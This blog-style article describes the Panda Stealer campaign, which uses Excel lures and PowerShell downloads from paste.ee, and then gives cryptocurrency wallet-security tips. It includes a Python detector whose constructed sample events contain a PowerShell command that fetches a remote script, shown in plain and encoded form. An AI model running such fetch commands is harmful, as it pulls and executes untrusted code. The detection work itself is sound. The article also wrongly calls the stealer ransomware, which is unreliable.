Panda attacks on crypto wallets

I’m not talking about attacks by a cuddly black and white bear from China, but instead a series of new ransomware attacks. The ‘Panda’ malware has been targeting cryptocurrency wallets, “along with account credentials from other applications such as NordVPN, Telegram, Discord and Steam,” according to a Coindesk report.

Trend Micro, a cybersecurity company, discovered the malware that steals information and dubbed it ‘Panda Stealer’. The malware has been found targeting individuals across countries including the US, Australia, Japan, and Germany.

The malware begins its infection chain through phishing emails that pretend to be business quote requests.

According to ZDNet, two methods have been linked to the campaign: the first uses attached .XLSM documents that require victims to enable malicious macros. If macros are permitted, a loader then downloads and executes the main stealer.

In the second method, “an attached .XLS file contains an Excel formula that hides a PowerShell command. This command attempts to access a paste.ee URL to pull a PowerShell script to the victim’s system and to then grab a fileless payload.”
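The second method leaves a recognisable trace in process-creation logs: Excel starting PowerShell, with a paste.ee URL in the command line either in plain text or inside an -EncodedCommand argument. The sketch below is an added example, not code from Trend Micro, ZDNet or this article; the field names follow Sysmon process-creation events, and the sample events and paste path are constructed.

```python
import base64
import re

OFFICE_PARENTS = {"excel.exe"}              # the campaign's lures are Excel files
SHELLS = {"powershell.exe", "pwsh.exe"}
PASTE_HOSTS = {"paste.ee"}                  # host named in the article
# -EncodedCommand and its accepted short forms, followed by a base64 blob
ENC_ARG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc[a-z]*)\s+([A-Za-z0-9+/=]{8,})")
URL_HOST = re.compile(r"(?i)https?://([a-z0-9.-]+)")

def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def expand_encoded(cmdline):
    """Return cmdline plus the decoded text of any -EncodedCommand blob."""
    out = cmdline
    for blob in ENC_ARG.findall(cmdline):
        try:  # PowerShell expects base64 over UTF-16LE text
            out += " " + base64.b64decode(blob, validate=True).decode("utf-16-le")
        except ValueError:  # covers bad base64 and bad UTF-16
            pass
    return out

def classify(event):
    """None, 'office-spawned-shell' or 'office-shell-paste-fetch'."""
    if basename(event["ParentImage"]) not in OFFICE_PARENTS:
        return None
    if basename(event["Image"]) not in SHELLS:
        return None
    hosts = {h.lower() for h in URL_HOST.findall(expand_encoded(event["CommandLine"]))}
    return "office-shell-paste-fetch" if hosts & PASTE_HOSTS else "office-spawned-shell"

def encode_ps(text):  # helper to build the constructed encoded sample
    return base64.b64encode(text.encode("utf-16-le")).decode()

EXCEL = r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
FETCH = "Invoke-WebRequest https://paste.ee/r/PLACEHOLDER"   # constructed, not a real paste
SAMPLE_EVENTS = [  # constructed process-creation records
    {"ParentImage": EXCEL, "Image": PS, "CommandLine": "powershell.exe " + FETCH},
    {"ParentImage": EXCEL, "Image": PS, "CommandLine": "powershell.exe -enc " + encode_ps(FETCH)},
    {"ParentImage": EXCEL, "Image": PS, "CommandLine": "powershell.exe -Command Get-Date"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS, "CommandLine": "powershell.exe " + FETCH},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(classify(ev), "|", ev["CommandLine"][:60])
```

Any shell started by Excel is worth a look on its own; the paste-site match raises the priority.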

Once downloaded, Panda Stealer will attempt to detect keys and addresses associated with cryptocurrency wallets holding funds including Ethereum (ETH), Litecoin (LTC), Bytecoin (BCN), and Dash (DASH).

Trend Micro researchers who discovered the attack said, “Crypto wallets are now as big of a target for online theft as banking accounts are. With more people getting into cryptocurrencies and the values of said cryptocurrencies still increasing, this will only become a greater threat moving forward.”

They also pointed out that there is more risk here because, unlike theft via a bank or a credit card, there may not be a central authority that can undo malicious transactions. Once you lose your money and the transaction goes on the blockchain, it’s likely gone forever.

“None of this is particularly novel in and of itself – malicious Office documents are well known, so is fileless loading,” Trend Micro researchers said. “The main ‘new’ aspect here is the target of the data theft.” For example, attackers are setting their sights on applications like Discord and Telegram – popular communications platforms for cryptocurrency communities.

Even if this type of attack is new, Trend Micro recommends following standard security practices: not opening attachments sent via email, not clicking on unknown links, and keeping software up to date are still basic security measures people can take to avoid malware and other security breaches. They added that the best advice is to secure your cryptocurrency wallets and recommended using strong, unique passwords, and commented, “For investors who are more interested in holding cryptocurrencies for the long term instead of actively trading them, the use of hardware-based/offline wallets may well be safer, if less convenient to add to or sell from.”

Top tips for keeping your cryptocurrency wallet secure

If you’re a newcomer to the crypto space it’s likely you’re excited about it, but at the same time worried about security because you have heard the stories about people losing fortunes just because they lost the password to their crypto wallet. On top of that, you may have searched for reliable information about keeping your wallet secure, but haven’t found it yet. It’s important that you carefully consider the pros and cons of how you ultimately decide to purchase, store and transact with your crypto. After all, if you lose your crypto it is gone forever!

How people lose their crypto

Here are some of the ways in which people have lost their cryptocurrency holdings:

Loss

• Human error (e.g., you send your funds to the wrong wallet, you forget your password)

• Natural disaster (e.g., your house burns down with your crypto wallet(s) stored inside it)

• Hardware malfunction/loss (e.g., your computer hard drive holding your private keys is corrupted)

Theft

• Remote theft (e.g., you fall victim to scams, an exchange hack, or a personal hack)

• Physical robbery (e.g., your backpack or purse is stolen with your private keys in it)

• Government seizure (e.g., law enforcement demands that an exchange freeze your account)

I hope none of these happen to you.

Types of wallets

A wallet is a computer programme that stores crypto. Depending on whether the wallet is connected to the internet, crypto wallets are classified as “hot” (online) or “cold” (offline).

Hot wallets

Hot storage wallets exist on an internet-connected desktop, laptop, mobile phone or web browser. These wallets are popular because they can be easily created and used immediately. This means some safety is sacrificed and they are vulnerable to cyber attacks.

Cold wallets

Cold storage wallets exist on devices or physical media that are not connected to the Internet. Often they are like a USB flash drive. They are safer than hot wallets because private keys are generated and stored offline where they can’t be accessed by cybercriminals, but they can be stolen from you through a physical robbery. The downside is that funds in a cold wallet aren’t as available for spending as those in a hot wallet. The most reliable exchanges, such as Kraken, Coinbase and Binance, use both hot and cold wallets so that some funds are always available for immediate use (in hot wallets) to facilitate day-to-day transactions, while the majority are stored offline for safekeeping (cold wallets).

When storing your crypto, you should take your own personal financial situation and risk tolerance into account when you are considering which one of the following storage strategies to use.

The small investor

If you have less than $10,000 in crypto, the best advice is to keep things simple and use a reputable exchange to store your crypto. Kraken, Coinbase and Binance are the big names, but your choice may depend on where you live.

The medium investor

With $10,000 – $200,000 in crypto, you should use a hardware wallet and place a backup copy in a safety deposit box.

The large investor

If you have over $200,000 in crypto, you need a trusted custodian, multi-signature wallet technology and/or full nodes. Consulting with a professional about this is recommended.

How Do Wallets Work?

Crypto wallets function in a similar way to traditional bank accounts, in that both an “account number” and “password” are required to access the funds held in the wallet. When you create a wallet, you generate a unique cryptographic key pair – one public and one private – which allows you to send or receive crypto. The public key is like your bank account number, and the private key acts in a similar way to your banking password. Here is an example of how a wallet operates for a transaction:

Example of a Bitcoin Transaction

1. Alice owes Bob 0.02 bitcoin

2. Bob sends Alice his public wallet address to receive payment

3. Alice uses her own private key to send 0.02 bitcoin associated with one of her wallets to Bob’s public wallet address

4. The 0.02 bitcoin sent by Alice is received in Bob’s wallet.

And that’s how easy it is.

A last word of advice

Don’t store your assets in desktop wallets, ‘brain’ wallets (i.e., memorized private key), or web wallets (i.e., private key held on a website) as these wallets offer low security. If you are going to buy a hardware or software wallet, buy it from a reputable authorized retailer and not from second-hand stores, such as eBay.

Finally, every crypto owner must have a plan for their crypto when they pass away. If no plan is put in place, your crypto assets will die along with you. It’s essential that every crypto owner includes their crypto asset holdings in their will and teaches one or more trusted individuals (i.e. family members) how to access their crypto funds in the case of severe injury or death.